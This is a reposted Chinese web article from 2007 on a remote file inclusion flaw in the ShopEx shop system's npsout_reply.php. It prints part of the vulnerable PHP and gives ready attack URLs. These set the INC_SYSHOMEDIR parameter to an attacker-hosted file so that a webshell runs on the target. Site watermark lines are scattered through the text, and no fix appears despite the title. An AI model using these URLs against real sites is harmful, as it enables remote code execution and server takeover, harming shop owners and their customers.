This Domain(Admin5.com) is for Sale:

SHOPEX最新漏洞利用及解决方案

时间:2007-10-27  来源:不详  作者:林仙

$m_ocomment = $orderArray[16];
$modate = $orderArray[17];
$Status = $orderArray[18];
if ($Status == 2)
{
$Order = newclass("Order");
$Order->shopId = $INC_SHOPID;
$Order->payid = $m_orderid;
$arr_paytime = getUnixtime(); //支付时间
$Order->onlinePayed($arr_paytime[0], $arr_paytime[1]);

copyright dedecms



$tmp_orderno = $Order->getorderidbyPayid($Order->payid); //拿出商店订单号
$state = 2 ;
$strinfo = $PROG_TAGS["ptag_1334"];
}
else{
$state = 1 ;
$strinfo = $PROG_TAGS["ptag_1335"];
}
}else{
$state = 0 ;
$strinfo = $PROG_TAGS["ptag_1336"];
}

Header("Location: ./index.php?gOo=pay_reply.dwt&orderid=".$tmp_orderno."&state=".$state."&strinfo=".urlencode($strinfo));
?>

dedecms.com

  假设在 http://www.sagi.net.cn 根目录下有个include文件夹,里面有PayFunction.php文件(这是我们自己构造的,当然文件的内容可是小马也可是大马 呵呵) 本文来自织梦

  我们用如下方法就可以利用之http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn

织梦内容管理系统

  简单的说远程攻击者可以利用漏洞以WEB进程权限执行任意PHP命令。具体情节是'npsout_reply.php'脚本对用户提交的'npsout_root_path'参数缺少过滤指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码

本文来自织梦

  漏洞实战:

织梦内容管理系统

构造URL:
http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
注意:
[
http://www.sagi.net.cn/php.txt?] 其实并没有在 http://www.sagi.net.cn 所在的服务器上执行而是在 "http://www.xxxx.com" 上执行的。

看完这篇,您有何感觉呢?

文章评论

共有位Admini5网友发表了评论 查看完整内容

24小时热门信息